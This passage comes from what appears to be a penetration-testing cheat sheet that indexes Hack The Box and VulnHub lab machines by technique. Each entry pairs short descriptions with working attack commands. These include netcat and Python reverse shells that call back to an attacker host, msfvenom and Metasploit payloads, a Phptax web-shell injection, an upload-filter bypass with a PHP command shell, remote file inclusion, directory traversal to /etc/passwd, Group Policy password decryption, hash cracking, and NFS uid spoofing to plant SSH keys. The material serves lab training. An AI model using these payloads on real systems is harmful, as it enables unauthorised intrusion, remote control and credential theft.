[`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 5. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="exploit_defaultcreds"></a> #### exploit_defaultcreds [⇡](#exploit) Use default credentials to interact with a service | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Mirai](https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf) | [htb#64](https://www.hackthebox.eu/home/machines/profile/64) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png" width="100" height="100" /> | [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_drupal_passwordcrack"></a> #### exploit_drupal_passwordcrack [⇡](#exploit) Crack a drupal password hash ```shell hashcat -m 7900 hash.txt /usr/share/wordlists/rockyou.txt -o cracked.txt --force ``` [+] https://0xdf.gitlab.io/2019/03/12/htb-bastard.html --- <a name="exploit_ftp_anonymous"></a> #### exploit_ftp_anonymous [⇡](#exploit) Interact with the ftp service using `anonymous/any` credentials | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://www.hackthebox.eu/home/machines/profile/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | --- <a name="exploit_ftp_web_root"></a> #### exploit_ftp_web_root [⇡](#exploit) FTP server's root directory is mapped to the web server's root directory. Upload a reverse shell file native to the web server using ftp server (`anonymous` login or default creds or creds reuse or some exploit) and trigger it's execution to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://www.hackthebox.eu/home/machines/profile/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | --- <a name="exploit_gpp_groupsxml"></a> #### exploit_gpp_groupsxml [⇡](#exploit) the Groups.xml file lists username and encrypted password that can be useful to gain initial access on the target system. access this file via an open ftp/smb share or some other method ```shell smbclient //10.10.10.100/Replication get ..\\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml Groups.xml exit cat Groups.xml gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" smbclient //10.10.10.100/Users -U SVC_TGS ``` [+] https://0xrick.github.io/hack-the-box/active/ [+] https://adsecurity.org/?p=2288 --- <a name="exploit_gymsystem_rce"></a> #### exploit_gymsystem_rce [⇡](#exploit) use `/contacts.php` to confirm the version is 1.0 and fire this exploit to get a pseudo-interactive shell on the target machine. you can ```shell python 48506.py http://<targetip>:<targetport>/ curl "http://<targetip>:<targetport>/upload/kamehameha.php?telepathy=whoami" ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf) | [htb#263](https://www.hackthebox.eu/home/machines/profile/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) | [+] https://www.exploit-db.com/exploits/48506 --- <a name="exploit_hfs_cmd_exec"></a> #### exploit_hfs_cmd_exec [⇡](#exploit) HFS (`HttpFileServer 2.3.x`) is vulnerable to remote command execution ```shell python 39161.py <targetip> <targetport> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Optimum](https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf) | [htb#6](https://www.hackthebox.eu/home/machines/profile/6) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png" width="100" height="100" /> | [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) | [+] https://www.exploit-db.com/exploits/39161 [+] https://nvd.nist.gov/vuln/detail/CVE-2014-6287 --- <a name="exploit_iis_asp_reverseshell"></a> #### exploit_iis_asp_reverseshell [⇡](#exploit) use an `asp`|`aspx` reverse shell to gain interactive access on the target system. useful when Microsoft IIS server is found during enumeration. might need a separate vulnerability to upload the reverse shell file on target system (use burp to bypass filename filter - revshell.aspx%00.jpg) ```shell msfvenom -p windows/shell/reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f asp >rs.asp msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f aspx >rs.aspx ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://www.hackthebox.eu/home/machines/profile/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | [+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#kali-aspx-shells --- <a name="exploit_iis_webdav"></a> #### exploit_iis_webdav [⇡](#exploit) multiple iis webdav issues. can use msf exploits `windows/iis/iis_webdav_scstoragepathfromurl` or `windows/iis/iis_webdav_upload_asp` to gain interactive access on the target system ```shell msfconsole use windows/iis/iis_webdav_scstoragepathfromurl set rhost <targetip> set rport <targetport> show options exploit use windows/iis/iis_webdav_upload_asp set rhost <targetip> set rport <targetport> show options exploit ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Grandpa](https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf) | [htb#13](https://www.hackthebox.eu/home/machines/profile/13) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070) | | 2. | [Granny](https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf) | [htb#14](https://www.hackthebox.eu/home/machines/profile/14) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051) | [+] https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_scstoragepathfromurl [+] https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_upload_asp --- <a name="exploit_lotuscms"></a> #### exploit_lotuscms [⇡](#exploit) LotusCMS is vulnerable to remote code execution ```shell nc -nlvp <attackerport> ./lotusRCE.sh <targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100" /> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | [+] https://github.com/Hood3dRob1n/LotusCMS-Exploit/blob/master/lotusRCE.sh --- <a name="exploit_modssl"></a> #### exploit_modssl [⇡](#exploit) Apache `mod_ssl < 2.8.7` is vulnerable to remote code execution ```shell gcc -o 47080 47080.c -lcrypto ./47080 0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2 ./47080 0x6b <targetip> <targetport> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1 (#1)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf) | [vh#22](https://www.vulnhub.com/entry/kioptrix-level-1-1,22/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png" width="100" height="100" /> | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) | [+] https://www.exploit-db.com/exploits/47080 [+] https://nvd.nist.gov/vuln/detail/CVE-2002-0082 --- <a name="exploit_mongodb"></a> #### exploit_mongodb [⇡](#exploit) ```shell nc -nlvp <attackerport> mongo -p -u <user> <record> db.tasks.insert({"cmd": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerip> <attackerport> >/tmp/f"}) bye ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | --- <a name="exploit_nfs_rw"></a> #### exploit_nfs_rw [⇡](#exploit) when an open nfs share is found, look for available mountpoints, mount using `nfsv3` so that we can see the real remote `uid` and `gid`, create a new user with expected `uid`, switch user, create the `.ssh` directory, copy `id_rsa.pub` to this directory and ssh to gain interactive access on the target system ```shell check available mountpoints mount file system via nfs v3 check uid of user create a new local user with nfs user's uid change to new user copy ssh public key to .ssh/authorized_keys file ssh into the target as user copy root owned copy of bash from local system to nfs mount running "./bash -p" gives root access as euid is carried over during copy operation mount nfsv3, create new user with nfs user uid and get root shell unmount and remove temporary user: showmount -e <targetip> mkdir /tmp/nfs mount <targetip>:/home/vulnix /tmp/nfs -o vers=3 # nfs v3 allows listing of user ids for shared files ls -l /tmp/nfs # check the uid and use it to create new user useradd -u 2008 vulnix su vulnix copy ~/.ssh/id_rsa.pub to ~/.ssh/authorized_keys on target host to gain passwordless ssh access umount /tmp/nfs ; userdel vulnix showmount -e <targetip> Export list for <targetip>: /home/vulnix * mkdir ./mnt/ mount <targetip>:/home/vulnix ./mnt -o vers=3 ls -l groupadd --gid 2008 vulnix ; useradd --uid 2008 --groups vulnix vulnix cp ~/.ssh/id_rsa.pub ./authorized_keys su vulnix cd ./mnt/ mkdir .ssh/ cp ./authorized_keys ./.ssh/ exit ssh vulnix@<targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | | 2. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | [+] https://blog.christophetd.fr/write-up-vulnix/ --- <a name="exploit_nodejs"></a> #### exploit_nodejs [⇡](#exploit) inspect source for `assets/js/app/controllers/*.js` files and look for rest api calls that could leak sensitive information | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | --- <a name="exploit_nodejs_deserialize"></a> #### exploit_nodejs_deserialize [⇡](#exploit) user input is passed to `unserialize()` method that could allow remote code execution [+] https://dastinia.io/write-up/hackthebox/2018/08/25/hackthebox-celestial-writeup/ [+] https://github.com/hoainam1989/training-application-security/blob/master/shell/node_shell.py [+] https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py [+] https://0xdf.gitlab.io/2018/08/25/htb-celestial.html --- <a name="exploit_pchart"></a> #### exploit_pchart [⇡](#exploit) the `pChart 2.1.3` web application is vulnerable to directory traversal ```shell http://<targetip>/pChart2.1.3/examples/index.php?Action=View&Script=/../../etc/passwd ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100" /> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) | [+] https://www.exploit-db.com/exploits/31173 [+] https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb --- <a name="exploit_pfsense"></a> #### exploit_pfsense [⇡](#exploit) pfsense 2.1.3 is vulnerable to command injection ```shell python3 43560.py --rhost <targetip> --lhost <attackerip> --lport <attackerport> --username foo --password bar ``` [+] https://www.exploit-db.com/exploits/43560 [+] https://medium.com/@ranakhalil101/hack-the-box-sense-writeup-w-o-metasploit-ef064f380190 --- <a name="exploit_php_acs_rfi"></a> #### exploit_php_acs_rfi [⇡](#exploit) Advanced Comment System 1.0 is vulnerable to remote file inclusion and command execution attacks ```shell curl -v "<targetip>/internal/advanced_comment_system/admin.php?ACS_path=php://input%00" -d "<?system('whoami');?>" ``` [+] https://www.exploit-db.com/exploits/9623 --- <a name="exploit_php_fileupload"></a> #### exploit_php_fileupload [⇡](#exploit) certain poorly developed php web applications allow unrestricted file uploads that can be abused to gain interactive access on the target system ```shell cp /usr/share/webshells/php/php-reverse-shell.php ./rs.php subl rs.php # point to <attackerip> and <attackerport> nc -nlvp <attackerport> # upload rs.php and trigger execution ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 2. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | | 3. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | --- <a name="exploit_php_fileupload_bypass"></a> #### exploit_php_fileupload_bypass [⇡](#exploit) add gif file magicbytes `GIF891` to a php reverse shell file, rename it to rs.php.gif and upload to bypass upload filter. sometimes, a restrictve waf might still stop file upload. in that case, use a minimal command execution php file with gif magicbytes instead of a full php reverse shell ```shell cp /usr/share/webshells/php/php-reverse-shell.php ./rs.php.gif subl rs.php.gif # point to <attackerip> and <attackerport> AND add GIF89a to the start of file nc -nlvp <attackerport> # upload rs.php.gif and trigger execution ### echo -e 'GIF89a\n<?php $out=$_GET["cmd"]; echo `$out`; ?>' >cmd.gif # upload and execute commands ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [IMF: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf) | [vh#162](https://www.vulnhub.com/entry/imf-1,162/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof) | | 2. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | --- <a name="exploit_php_reverseshell"></a> #### exploit_php_reverseshell [⇡](#exploit) use php reverse shell code with an exploit to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 2. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100" /> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 3. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 4. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | | 5. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 6. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_php_webshell"></a> #### exploit_php_webshell [⇡](#exploit) use the php web shell to execute arbitrary commands and gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | --- <a name="exploit_phptax"></a> #### exploit_phptax [⇡](#exploit) the `Phptax 0.8` web application is vulnerable to remote code execution ```shell GET /phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E HTTP/1.1 Host: <targetip>:<targetport> User-Agent: Mozilla/4.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0 GET /phptax/data/rce.php?cmd=uname%20-a HTTP/1.1 Host: <targetip>:<targetport> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100" /> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) | [+] https://www.exploit-db.com/exploits/25849 --- <a name="exploit_prtg_sensors"></a> #### exploit_prtg_sensors [⇡](#exploit) execute a reverse shell command through prtg sensor creation dialog and play it to get interactive access on the target system ```shell ./46527.sh -u http://<targetip> -c "<prtg session cookie>" psexec.py pentest@10.10.10.152 ``` [+] https://www.exploit-db.com/exploits/46527 [+] https://nvd.nist.gov/vuln/detail/CVE-2018-9276 [+] https://hipotermia.pw/htb/netmon [+] https://snowscan.io/htb-writeup-netmon/# --- <a name="exploit_psexec_login"></a> #### exploit_psexec_login [⇡](#exploit) If credentials for a non-administrative user are available, we can use `psexec.py` to connect and gain interactive access to the target system. ```shell psexec <username>@<targetip> ``` --- <a name="exploit_python_reverseshell"></a> #### exploit_python_reverseshell [⇡](#exploit) use a python reverse shell to gain interactive access on the target system ```shell nc -nlvp 9999 http://<targetip>/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attackerip>",<attackerport>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://www.hackthebox.eu/home/machines/profile/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), 